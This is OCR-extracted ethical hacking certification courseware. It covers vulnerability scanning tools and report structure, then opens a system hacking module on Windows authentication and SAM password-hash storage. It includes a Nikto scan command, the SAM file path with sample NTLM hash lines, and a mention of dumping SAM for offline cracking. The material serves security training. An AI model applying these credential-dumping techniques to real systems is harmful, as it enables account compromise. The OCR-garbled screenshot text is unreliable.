Types of vulnerabilities being assessed: The most important information at the time of evaluating any tool is to find out how many types of vulnerabilities it will discover.

=

Testing capability of scanning: The vulnerability assessment tool must have the capacity to execute the entire selected test and must scan all the systems selected for scanning.

=

Ability to provide accurate reports: The ability to prepare an accurate report is essential. Vulnerability reports should be short, clear, and should provide an easy method to mitigate the discovered vulnerability.

=

Efficient and accurate scanning: Two essential aspects of scanner performance are how much time it takes for a single host and what resources are required, and the loss of services at the time of scanning. It is important to ensure accuracy and to be aware of the accuracy of the results.

=

Capability to perform a smart search: How clever they are at the time of scanning is also a key factor in judging any vulnerability assessment tool.

=

Functionality for writing its own tests: When a signature is not present for a recently found vulnerability, it is helpful if the vulnerability scanning tool allows the use of userdeveloped tests.

=

Test run scheduling: It is important to be able to do test-run scheduling as it allows users to perform scanning when traffic on the network is light.

Best Practices for Selecting Vulnerability Assessment Tools Some of the best practices that can be adopted for selecting vulnerability assessment tools are: =

Vulnerability assessment tools are used to secure and protect the organization’s system or network. Ensure that they do not damage the network or system while running.

=

Before using any vulnerability assessment tools, it is important to understand their function and to decide what information is needed before starting

=

Security mechanisms for accessing from within and from outside the network are somewhat different, so decide the location for the scan based on the desired information

=

At the time of scanning, enable logging and ensure that all outcomes and methodologies are annotated every time a scan is performed on any computer

=

Users should frequently scan their systems for vulnerabilities and regularly monitor them for vulnerabilities and exploits

Module 05 Page 563

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis

Exam 312-50 Certified Ethical Hacker

Vulnerability Assessment Tools: Qualys Vulnerability Management

@ Acloud-based service that | | © overs offe

immediate

global

visibility into IT system

elorisdys

Internet threats and how

Results

to protect them

December 25

a

areas that might be

vulnerable to the latest ‘@

Vulnerability Scorecard Report

€ | EH

~~)

\VulncaityDietibtion by Sevety Level

Veter Dattoten by Tne

Aids in the continuous

identification of threats

and monitoring of unexpected changes ina network before they become breaches

1O) Qualys.

Vulnerability Assessment Tools: Nessus Professional and GFI LanGuard Nessus

| Mar titoe contortion tee : Professional and malware

GFI

LanGuard |

cE H Pood beatla

Scans, detects, assesses, and rectifies security _

vulnerabilities ina network andconnected devices

SRE

seRvERZ019 (1010110)

AE

aR

°

‘etas/aruw tenable com

Module 05 Page 564

Tttps Janu aficom

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis

Exam 312-50 Certified Ethical Hacker

Vulnerability Assessment Tools: OpenVAS and Nikto A framework of several services and tools offering a comprehensive and powerful vulnerability scanning and vulnerability

Nikto

|

management solution

Aweb

CE H

server assessment tool that examines

a web serverto discover potential problems

and security vulnerabilities

@rrts ae?

Al Rights Reserved. Reproduction i

Other Vulnerability Assessment Tools RQ

&@

CE H

Qualys FreeScan eps. quals.com

beSECURE (AVDS) ‘tts: fae beyondsecurty.com

Acunetix Web Vulnerability Scanner ‘etps://rou.acunetixcom

Core Impact Pro -eeps:/ ae coresecurty.com

Nexpose p/w 0p? com

N-Stalker Web Application Security Scanner eps:/ anew stalker com

Network Security Scanner

Gisen7

‘spss

————"

haus,

beyond

secom

a SAINT

ei}

i

ManageEngine Vulnerability

= Manager Plus

_https://www.manageengine.com

Nipper Studio Se.

served Reproduction i

Vulnerability Assessment Tools An attacker performs vulnerability scanning to identify security loopholes in the target network that they can exploit to launch attacks. Security analysts can use vulnerability assessment tools to identify weaknesses present in the organization’s security posture and remediate the identified vulnerabilities before an attacker exploits them.

Module 05 Page 565

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis

Exam 312-50 Certified Ethical Hacker

Network vulnerability scanners help to analyze and identify vulnerabilities in the target network or network resources by using vulnerability assessment and network auditing. These tools also assist in overcoming weaknesses in the network by suggesting various remediation techniques. The following are some of the most effective vulnerability assessment tools: Qualys Vulnerability Management

Source: https://www.qualys.com Qualys VM is a cloud-based service that gives immediate, global visibility into where IT systems might be vulnerable to the latest Internet threats and how to protect them. It helps to continuously identify threats and monitor unexpected changes in a network before they turn into breaches. Features: °

Agent-based detection

Also works with the unscannable assets. o

Qualys

Cloud

Agents,

extending

its network

coverage

to

Constant monitoring and alerts When VM is paired with Continuous Monitoring (CM), InfoSec teams are proactively alerted about potential threats, so problems can be tackled before they turn into breaches.

o

Comprehensive coverage and visibility Continuously scans and identifies vulnerabilities for protecting IT assets onpremises, in the cloud, and at mobile endpoints. Its executive dashboard displays an overview of the security posture and gives access to remediation details. VM generates custom, role-based reports for multiple stakeholders, including automatic security documentation for compliance auditors.

o

VM for the perimeter-less world As enterprises adopt cloud computing, mobility, and other disruptive technologies for digital transformation, Qualys VM offers next-generation vulnerability management for these hybrid IT environments whose traditional boundaries have been blurred.

o

Discover forgotten devices and organize the host assets Qualys can help quickly determine what is running in different parts of the network—from the perimeter and corporate network to virtualized machines and cloud services. It can also identify unexpected access points, web servers, and other devices that can expose the network to attack.

©

Scan for vulnerabilities everywhere, accurately and efficiently Scan systems anywhere from the same console, including the perimeter, the internal network, and cloud environments.

Module 05 Page 566

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis o

Exam 312-50 Certified Ethical Hacker

Identify and prioritize risks Qualys, using trend analysis, Zero-Day, the highest business risks.

o

and

Patch

impact predictions, can

identify

Remediate vulnerabilities Qualys’s ability to track vulnerability data across hosts and time produces interactive reports that provide a better understanding of the security of the network.

@ ouaiys December 25

Vulnerability Scorecard Report

(Erm)

Vulnerability Scorecard Report_system_PO_displayedAll

Source Business Unit Operating System A Results

Vulnerability Distribution by Type

Vulnerability Distribution by Severity Level

. . ore ore ‘Asset Groups

Title

The subnet

Leveld

72178) Fe

1800, a

10

Emety

Severites by Levels,

LevelS

Hosts

1

28 2 8 5

te

‘Vulnerability Type

1G

Potentiat

dreary

Levelt

Confirmed

1783,«1783—«1783

ms 59

ToT sms

3076

6

Level?

Level3

Pe

Cr)

Potent

ee

°

ee) °

°

0

0

6

68

1

a

2

% © New

Total

Vulnerability Status Active

Fixed

68,268 24

ReOpen

‘Vulnerability Age by Days >60

>30

>90

mw o © w

Cn er rd

ee)

28 Ea

a

a)



0

o

3

12 Ea

0

«8

mo

0

°

me

0

0

Eq

1

0

88%

86a

6

Figure 5.7: Vulnerability scanning using Qualys Vulnerability Management

Nessus Professional Source: https://www.tenable.com Nessus Professional is an assessment solution for identifying vulnerabilities, configuration issues, and malware that attackers use to penetrate networks. It performs vulnerability, configuration, and compliance assessment. It supports various

technologies

such

as operating

systems,

network

devices,

hypervisors,

databases,

tablets and phones, web servers, and critical infrastructure.

Nessus is the vulnerability scanning platform for auditors and security analysts. Users can schedule scans across multiple scanners, and use wizards to easily and quickly create policies, schedule scans, and send results via email.

Module 05 Page 567

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis

Exam 312-50 Certified Ethical Hacker

Features:

o

High-speed asset discovery

o

Vulnerability assessment

o

Malware and Botnet detection

o

Configuration and compliance auditing

o

Scanning and auditing virtualized and cloud platforms

6 Configure

Audit

© Trail

-

a

&

®

launch»

=

Repo

Vulnerabilities 34 Count =

ssucertfics..

General

SL Certificat..

General

SSL Cipher Bl. .

General

Scan Details

1

Vulnerabilities

Zywel Routers and Home Wifi Systems: Unprotected feed More

Figure 5.8: Vulnerability scanning using Nessus

=

GFI LanGuard Source: https://www.gfi.com GFI LanGuard scans for, detects, assesses, and rectifies security vulnerabilities in a network and its connected devices. This is done with minimal administrative effort. It scans the operating systems, virtual environments, and installed applications through vulnerability check databases. It enables analysis of the state of network security, identifies risks, and offers solutions before the system can be compromised. Features:

o

Patch management for operating systems and third-party applications

o

Vulnerability assessment

Module 05 Page 568

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis

Exam 312-50 Certified Ethical Hacker

o

AWeb reporting console

o

Track latest vulnerabilities and missing updates

o

Integration with security applications

o

Network device vulnerability checks

o

Network and software auditing

o

Support for virtual environments

GF LanGuard HER >

[> | dasttonrd|

You’ Fiter cap

@ seach

+ & Entre Network

scan

@© Overview

Q Matware Protection Issue @ unaumorized Appicatons

B cmeesrcsredpense, —||@ ana sues Som soa hosts

Agent Stats ‘Aaert Not Intalled *» etl cuca

SSiolepies ecaronre stein eases

Vuberbity Trend Over Tne =

© Sotwae

=» Hardware

@ Sytem . :

SERVERZOTS 1010119 2ss018250F

Sen ky

A

a

tv} Firewall Issues

4B trtamcnet =

:

Configuration

SERVER2019 (10.10.1.19)

Valeriy Level

a

Reports

x

vila

=

| tases ssciaaeenry

+ scan actnty [Remedaton Actty]

Reals Stats {A Other Vinerabites: 2 (5 Cth) Potential Vuinerabitties: 61

SSCS

B

a

@ hnstated Aopleations: 25 (0 unauthorized)

{%j Open Potts: 7 Shame: &

*

=

a

Figure 5.9: Vulnerability scanning using GFl LanGuard

OpenVAS

Source: https://www.openvas.org OpenVAS is a framework of several services and tools that offer a comprehensive and powerful vulnerability scanning and vulnerability management solution. The framework is part of Greenbone Network’s commercial vulnerability management solution,

developments from which have been contributed to the open-source community since 2009. The actual security scanner is accompanied by a regularly updated feed of Network Vulnerability Tests (NVTs), over 50,000 in total.

Module 05 Page 569

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis

Exam 312-50 Certified Ethical Hacker

i

ed @ Start @ Parrot

Community

@ D

Git @ cryptP

y

Dashboards

EB Learn

Configuration

@¥OA RepoThu,

rt:

Information

sD UTC

Results

Hosts

(40f46)

Administration

iter

Mar 31, 2022

4:03 AM

©

Ports

(ofl)

(of a7)

x

Applications

(0 of0)

419-8

Operating

bd

CVEs

Systems (ort)

Closed

(Gof — CVEs x (@ ore

TLS

Certificates (oly

Error

User

Messages (0 of 0)

Tags @ 1-40f4

‘Vulnerability

Location

Report outdated / end-oflife Scan Engine / Environment (local) DCE/RPC and MSRPC Services Enumeration Reporting ‘SSL/TLS: iets Deprecated TLSv1.0 and TLSv1.1 Protocol ‘TcP timestamps

=O

evs teel

Toe

z,

Tore

Created

97% 1010.22

generainep Thu; Mar

80%

—10.10.1.22

135/tep

98%

10.10.1.22

3389p

80%

—10.10.1.22

generaljtep

Thu, 4:13 Thu, 4:39 Thu, 4:04

32,2022

Mar 31, 2022 AM UTC Mar 31, 2022 AM UTC Mar 31, 2022 AM UTC 1-40f4

Figure 5.10: Vulnerability scanning using OpenVAS

=

Nikto Source: https://cirt.net Nikto is an Open Source (GPL) web server scanner that performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files or programs, checks for outdated versions of over 1250 servers, and checks for version specific problems on over 270 servers. It also looks at server configuration items such as the presence of multiple index files and the HTTP server options and will attempt to identify installed web servers and software. Features:

o oA

SSL Support (Unix with OpenSSL or maybe Windows with ActiveState’s Perl/NetSSL) full HTTP proxy support

o

Checks for outdated server components

oO.

Saves reports in plain text, XML, HTML, NBE or CSV

o

ATemplate engine to easily customize reports

o

Scans multiple ports on a server, or multiple servers via input file

o

LibWhisker’s IDS encoding techniques

Module 05 Page 570

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Vulnerability Analysis o

Identifies installed software via headers, favicons, and files

©

Host authentication with Basic and NTLM

o

Subdomain guessing

o

Apache and cgiwrap username enumeration

©

Scan tuning to include or exclude entire classes of vulnerability checks

©

Guesses credentials for authorization realms (including many default ID and password combinations)

re

nikto -h www.certifiedhacker.com Nikto v2.1.6

Target Target Target Start

IP Hostname Port Time

-Tunin

241.216.11 rtifiedhacker.com

GMT-4

03-31 07:32:51

nginx/1.19.10 The anti-clickjacking X-Frame-Options header is not pres nt The X-XSS-Pr n header is ni defined. This header hint to the S st some forms Uncommon

tents HIT nts true

found found

he

header

r agent to protect again

Uncommon header 'x Uncommon header ‘ho: found, contents kLmJsdWVob3NOLmN The X-Content-Type-Options header is not Thi could allow the user agent to render the content of the site in a different fashion to the MIME type Server banner has changed from ‘nginx/1.19.10 to ‘Apache’ which may suggest a WAF, load balancer c proxy

is in plac

rtifiedhacker.zip

Allowed

HTTP

Methods:

Potentially

OPTIONS,

inte

HEAD,

archive/cert

GET

file found

bmail/blank.html: IlohaMail 0.8.10 c an XSS vulnerability. ript vulnerabilitie Web er Contro Panel ed mail f age instal ed ‘mailman/listinfc

OSVDB-3268 @ nikt

cpanel

Web-based ory

Mailman

indexing

found

rol panel

on

the

Previous

versions

contain othe

server

found

tifiedh.

Figure 5.11: Screenshot of Nikto Listed below are some of the additional vulnerability assessment tools:

=

Qualys FreeScan (https://www.qualys.com)

=

Acunetix Web Vulnerability Scanner (https://www.acunetix.com)

=

Nexpose (https://www.rapid7.com)

=

Network Security Scanner (https://www.beyondtrust.com)

=

SAINT (https://www.carson-saint.com)

=

beSECURE (AVDS) (https://www.beyondsecurity.com)

Core Impact Pro (https://www.coresecurity.com) Module 05 Page 571

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Vulnerability Analysis

Exam 312-50 Certified Ethical Hacker

=

N-Stalker Web Application Security Scanner (https://www.nstalker.com)

=

ManageEngine Vulnerability Manager Plus (https://www.manageengine.com)

=

Nipper Studio (https://www.titania.com)

Vulnerability Assessment Tools for Mobile =

Vulners Scanner Source: https://vulners.com Vulners scanner is an Android application that performs passive vulnerability detection based on a software version’s fingerprint. Since this is a passive method of vulnerability assessment, this app can only be used to identify vulnerabilities; it is not effective in performing compliance checks. €

Share scan result

J

Risk | Critical

Score

php - 5.6.31

nginx - 1.14.0 jQuery Migrate -

1.2.1

Figure 5.12: Vulners Scanner — critical risk score

Module 05 Page 572

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis

Exam 312-50 Certified Ethical Hacker

Vulners Scanner

Risk

(Medi

co)

History Figure 5.13: Vulners Scanner — medium risk score

=

SecurityMetrics Mobile

Source: https://www.securitymetrics.com SecurityMetrics Mobile is a mobile defense tool that helps to identify mobile device vulnerabilities to protect customers’ sensitive data. It helps to avoid threats that originate from mobile malware, device theft, Wi-Fi network connectivity, data entry, personal and business use, unwarranted app privileges, data and device storage, account data access, Bluetooth, Infrared (IR), Near-field communication (NFC), and SIM and SD cards.

SecurityMetrics MobileScan complies with PCI SSC (Payment Card Industry Security Standards Council) guidelines to prevent mobile data theft. On completion of a scan, the report generated comprises a total risk score, a summary of discovered vulnerabilities, and recommendations on how to resolve threats.

Module 05 Page 573

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Vulnerability Analysis

securityMETRICS'

Mobile

PCI Issues Your device is not compliant. 25.70

EXi

Total Risk Score

Non-market App Installation

Non-market apps can be installed on this device.

YAM

USB Debugging

USB debugging is enabled, which could unintentionally expose sensitive data, ER:

OS Vulnerabilities

©Check

B

bo

Pcistatus

Settings

Figure 5.14: SecurityMetrics Mobile — Risk Score

MOVs

securityMETRICS unavailable on this device.

|

11:28 AM

Mobile

Password Policy

This device is protected by a passcode.

|

Disk Encryption

The device has on-disk encryption enabled for added data security |

Operating System Integrity

This device is running Android 6.0.1

App Version

|

The current version of MobileScan is installed.

©heck

B Pci status

%Settings

Figure 5.15: SecurityMetrics Mobile — result

Module 05 Page 574

| Hacking and Countermeasures Copyright © by EC-Col All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis

Exam 312-50 Certified Ethical Hacker

CEH

LO#04: Analyze Vulnerability Assessment Reports

Copyright © by

Al RightsReserved. Reprodu

Vulnerability Assessment Reports W

CE H

The vulnerability assessment report discloses the risks detected after scanning a network The report alerts the organization of possible attacks and suggests countermeasures

]

Information available in the reports is used to fix security flaws

IB

Vulnerability Assessment Report

Executive Summary

Assessment Overview

Findings

Risk Assessment

Recommendations Strictly Prohibited

Vulnerability Assessment Reports In the vulnerability assessment process, once all the phases are completed, the security team will review the results and process the information to prepare the final report. In this phase, the security team will try to disclose any identified vulnerabilities, document any variations and findings, and include all these in the final report along with remediation steps to mitigate the identified risks. Module 05 Page 575

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis

Exam 312-50 Certified Ethical Hacker

The vulnerability assessment report discloses the risks that are detected through scanning the network. Tools such as Nessus Professional, GFI LanGuard, and Qualys Vulnerability Management are used for vulnerability assessment. These tools provide a comprehensive assessment report in a specified format. The report alerts the organization to possible attacks

and suggests countermeasures.

The report provides details of all the possible vulnerabilities with regard to the company’s security policies. The vulnerabilities are categorized based on severity into three levels: High, Medium, and Low risk. High-risk vulnerabilities are those that might allow unauthorized access to the network. These vulnerabilities must be rectified immediately before the network is compromised. The report describes different kinds of attacks that are possible given the organization’s set of operating systems, network components, and protocols. The vulnerability assessment report must include, but are not limited to, the following points:

=

The vulnerability's name and its mapped CVE ID

=

The date of discovery

=

The score based on Common Vulnerabilities and Exposures (CVE) databases

= A detailed description of the vulnerability =

The impact of the vulnerability

=

Details regarding the affected systems

=

Details regarding the process needed to correct the vulnerability, including information patches, configuration fixes, and ports to be blocked.

= A proof of concept (PoC) of the vulnerability for the system (if possible)

Vulnerability Assessment Report

Executive Summary

Assessment Overview

Findings

Risk Assessment

Recommendations

Figure 5.16: Components of a vulnerability assessment report

Module 05 Page 576

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis

Components

Exam 312-50 Certified Ethical Hacker

of a Vulnerability Assessment Report

@ Executive Summary

@ Findings

© Assessmentscope and

© Prioritization of remediation based on

© Types of vulnerabilities identified

@ Testing narrative

the risk ranking

.

© Action plan to implement the

© Detailed information on identified vulnerabilities

@ Findings summary

@

@ Remediation summary

@ Assessment Overview

@ Recommendations

© Scanned hosts

objectives

recommendations for each identified vulnerability

Notes describing additional

details of scan results

© Classification of vulnerabilities based on the risk level

i ® ‘Scan information @ Target information

© Root-cause analysis @ Application of patches/fixes

© Risk Assessment

@ Assessment methodology

CE H

© Lessons learned @ Awareness training

© Potential vulnerabilities that can v compromise the system or

@ Implementation of periodic vulnerability i‘

© Critical hosts with severe vulnerabilities

© Implementation of policies, procedures, and controls

application

assessmen

Components of a Vulnerability Assessment Report A vulnerability assessment report provides detailed information regarding the vulnerabilities found in the computing environment. The report helps organizations identify the security posture of computing systems (such as web servers, firewalls, routers, email, and file services) and provide solutions to reduce system failures. An ethical hacker must be careful when analyzing vulnerability assessment reports to avoid false positives.

The assessment report helps organizations take mitigation steps to avoid risk proactively by identifying, tracking, and eliminating security vulnerabilities.

Vulnerability assessment reports are classified into two types: =

Security vulnerability reports

=

Security vulnerability summaries

Security Vulnerability Report

This is a combined report of all the scanned devices and servers in the organization’s network. The security vulnerability report includes the following details: =

Newly found vulnerabilities

=

Open ports and detected services

=

Suggestions for remediation

=

Links to patches

Module 05 Page 577

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis

Exam 312-50 Certified Ethical Hacker

Security Vulnerability Summary This report is produced for every device or server after scanning. It provides a summary of the scan result, which includes the following elements: =

Current security flaws

=

Categories of vulnerabilities

=

Newly detected security vulnerabilities

=

Severity of vulnerabilities

=

Resolved vulnerabilities

Avulnerability assessment report covers the following elements: =

Executive Summary

o

Assessment scope and objectives Purpose of the vulnerability scanning Scope of the scanning

o.

Testing narrative

Operating systems upon which scanning is performed IP addresses upon which scanning is performed Types of scans performed Date and time (Including start, end, and duration of scan)

o

Findings summary Critical vulnerabilities identified (highlights based on risk level) Y

Number of vulnerabilities based on severity (graphical representation)

Identified operating systems Performance of the systems and applications during the scan Overall risk level Critical issues that need to be addressed o =

Remediation summary

Assessment Overview

o

Assessment methodology

o

Scan information: information such versions, and the assets scanned.

o

Target information: Information about the target system’s name and address.

Module 05 Page 578

as the type

of scan

performed,

tools

used,

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis =

Exam 312-50 Certified Ethical Hacker

Findings °

Scanned hosts, including each host’s detailed information e

: Name and address of the host

e

: Operating system type

e

: Date of the test

e

Vulnerable services: Network services by their names and ports.

Types of vulnerabilities identified Detailed information on identified vulnerabilities (including CVE threat description, impact caused, remediation, and exploitability) °

=

=

ID, CVSS

score,

Notes describing additional details of scan results

Risk Assessment °

Classification of vulnerabilities based on the risk level: critical, high, moderate, low

°

Potential vulnerabilities that can compromise the system or application

°

Critical hosts with severe vulnerabilities

or

Recommendations ©

Prioritization of remediation based on the risk ranking

©

Action plan to implement vulnerability

co

Root-cause analysis

©

Application of patches/fixes

o

Lessons learned

o

Awareness training

o

Implementation of periodic vulnerability assessment

o

Implementation of policies, procedures, and controls

Module 05 Page 579

the

recommendations/remediation

for each

identified

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Vulnerability Analysis

Exam 312-50 Certified Ethical Hacker

Module Summary a

CE H

Q In this module, we have discussed: > The definition of vulnerability research, vulnerability assessment, and vulnerability management life cycle The CVSS vulnerability scoring system and databases Various types of vulnerabilities and vulnerability assessment techniques

vVvvyv

rt]

>

Various vulnerability assessment solutions, along with their characteristics

Various tools that are used to test a host or application for vulnerabilities, along with the criteria and best practices for selecting the tool We concluded with a detailed discussion on how to analyze a vulnerability assessment report and how it discloses the risks detected after scanning the network

Q Inthe next module, we will discuss the methods attackers, as well as ethical hackers and pen testers, utilize to hack a system based on the information collected about a target of evaluation; for example, footprinting, scanning, enumeration, and vulnerability analysis phases

Module Summary This module discussed vulnerability research, vulnerability assessment, and the vulnerabilitymanagement life cycle. It also discussed the CVSS vulnerability scoring system and databases and various types of vulnerabilities and vulnerability assessment techniques. It described various vulnerability assessment solutions along with their characteristics and described various vulnerability assessment tools that are used to test a host or application for vulnerabilities, along with the criteria and best practices for selecting the tool. Finally, this module ended with a detailed discussion on how to analyze a vulnerability assessment report and how it discloses the risks detected after scanning a network. The next module will show how attackers, as well as ethical hackers and pen testers, attempt system hacking based on the information collected about a target in the footprinting, scanning, enumeration, and vulnerability analysis phases.

Module 05 Page 580

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

C\EH

EC-Council

Certified |) Ethical Hacker

———

MODULE 06 SYSTEM HACKING ———

EC-COUNCIL OFFICIAL CURRICULA

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

CEH

o

LO#01: Demonstrate Different Password Cracking and Vulnerability Exploitation Techniques to Gain Access to the System LO#02: Use Different Privilege Escalation Techniques to Gain Administrative Privileges

o

o

LEARNING

OBJECTIVES

LO#03: Use Different Techniques to Hide Malicious Programs and Maintain Remote Access to the System LO#04: Demonstrate Techniques to Hide the Evidence of Compromise

Copyright © by

Al RightsReserved. Rep

Learning Objectives System hacking is one of the most important, and sometimes, the ultimate goal of an attacker. The attacker acquires information through techniques such as footprinting, scanning, enumeration, and vulnerability analysis and then uses this information to hack the target system. This module will focus on the tools and techniques used by an attacker to hack the

target system.

At the end of this module, you will be able to do the following: =

Explain the different techniques to gain access to a system

=

Apply privilege escalation techniques

=

Explain different techniques to gain and maintain remote access to a system

=

Describe different types of rootkits

=

Explain steganography and steganalysis techniques

=

Apply different techniques to hide the evidence of compromise

=

Apply various system hacking countermeasures

Module 06 Page 583

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

CEH

LO#01: Demonstrate Different Password Cracking and Vulnerability Exploitation Techniques to Gain Access to the System

Copyright © by

Al RightsReserved, Reproduction

i Strictly Prohibited.

Gaining Access As discussed in Module 01, the CEH hacking methodology (CHM) includes various steps attackers follow to hack systems. The following sections discuss these steps in greater detail. The first step involves the use of various techniques by attackers to gain access to the target system. These techniques include cracking passwords, exploiting buffer overflows, and exploiting identified vulnerabilities.

Module 06 Page 584

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Microsoft Authentication

CE H winds Sey

Security Accounts Manager (SAM) Database

Enter network credentials

. + 1, Windows stores user passwords .in SAM, or in. the Active Directory

Enter your credentials to connect to: SERVER2O19

database in domains. Passwords are never stored in clear text and are hashed, and the results are stored in the SAM

I

NTLM Authentication

The NTLM authentication protocol types are as follows: NTLM authentication protocol and LM authentication protocol These protocols store the user’s password in the SAM database using

different hashing methods

Remember my cece The username or pasword is incorrect fx

Cancel

ig Windows 11

Kerberos Authentication

Microsoft has upgraded its default authentication protocol to

Kerberos which provides a stronger authentication for client/server

applications than NTLM

Cracking Passwords Microsoft Authentication When users log in to a Windows computer, a series of steps are performed for user authentication. The Windows OS authenticates its users with the help of three mechanisms (protocols) provided by Microsoft. Security Accounts Manager (SAM) Database Windows

uses

the

Security

Accounts

Manager

(SAM)

database

or Active

Directory

Database to manage user accounts and passwords in hashed format (a one-way hash). The system does not store the passwords in plaintext format but in a hashed format, to protect them from attacks. The system implements the SAM database as a registry file, and the Windows kernel obtains and keeps an exclusive filesystem lock on the SAM file. As this file consists of a filesystem lock, this provides some measure of security for the storage of passwords. It is not possible to copy the SAM file to another location in the case of online attacks. Because the system locks the SAM file with an exclusive filesystem lock, a user cannot copy or move it while Windows is running. The lock does not release until the system throws a blue screen exception, or the OS has shut down. However, to make the password hashes available for offline brute-force attacks, attackers can dump the ondisk contents of the SAM file using various techniques. The SAM file uses an SYSKEY function (in Windows NT 4.0 and later versions) to partially encrypt the password hashes.

Module 06 Page 585

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Even if hackers use subterfuge techniques to discover the contents, the encrypted keys with

a one-way

hash

make

it difficult

to

hack.

In addition,

some

versions

have

a

secondary key, which makes the encryption specific to that copy of the OS. =

NTLM Authentication NT LAN Manager (NTLM) is a default authentication scheme that performs authentication using a challenge/response strategy. Because it does not rely on any official protocol specification, there is no guarantee that it works effectively in every situation.

Furthermore,

it has

been

used

in

some

Windows

installations,

where

it

successfully worked. NTLM authentication consists of two protocols: NTLM authentication protocol and LAN Manager (LM) authentication protocol. These protocols use different hash methodologies to store users’ passwords in the SAM database.

=

Kerberos Authentication Kerberos is a network authentication protocol that provides strong authentication for client/server applications through secret-key cryptography. This protocol provides mutual authentication, in that both the server and the user verify each other’s identity. Messages sent through Kerberos protocol are protected against replay attacks and eavesdropping.

Kerberos employs the Key Distribution Center (KDC), which is a trusted third party. This consists of two logically distinct parts: an authentication server (AS) and a ticketgranting server (TGS). Kerberos uses “tickets” to prove a user’s identity.

Microsoft has upgraded its default authentication protocol to Kerberos, which provides a stronger authentication for client/server applications than NTLM.

GF

x

windows security

Enter network credentials Enter your credentials to connect to: SERVER2019

assword

Remembermy credentials The username or password is incorrect.

Figure 6.1: Screenshot of Windows authentication

Module 06 Page 586

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

How Hash Passwords Are Stored in Windows

Fi ded ae

mone

a> OFet

SAM?

|

Password hash using LM/NTLM #44: 0CB6948805F797BF2A82807973B89537:

::

c: \windows\system32\config\SAM

How Hash Passwords Are Stored in Windows SAM? Windows OSs use a Security Account Manager (SAM) database file to store user passwords. The SAM file is stored at %SystemRoot%/system32/config/SAM in Windows systems, and Windows mounts it in the registry under the HKLM/SAM registry hive. It stores LM or NTLM hashed passwords. i

=

my

po,

5

bed

Shiela/test

a=,

hy

Password hash using LM/NTLM

Shiela:1005:NO

PASSWORD*##k AiR ERR

+ * : 0CB6948805F797BF2A82807973B89537: : :

Figure 6.2: Storing a user password using LM/NTLM hash

NTLM supersedes the LM hash, which is susceptible to cracking. New versions of Windows still support LM hashes for backward compatibility; however, Vista and later Windows versions disable LM hashes by default. The LM hash is blank in the newer versions of Windows. Selecting the option to remove LM hashes enables an additional check during password change operations but does not immediately clear LM hash values from the SAM. The SAM file stores a “dummy” value in its database, which bears no relationship to the user’s actual password and is the same for all user accounts. It is not possible to calculate LM hashes for passwords exceeding 14 characters in length. Thus, the LM hash value is set to a “dummy” value when a user or administrator sets a password of more than 14 characters.

Module 06 Page 587

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

‘System Hacking

c: \windows\system32\config\SAM Administrator:500:NO PASSWORD***# si sGieinink ik: 61880B9EE373475C8148A7108ACB3031: Guest:501:NO PASSWORD*#* #4 #4 ks eke REE ENO PASSWORDE EI a ky Admin:1001:NO

PASSWORD** **# #4 +i tit

CC:

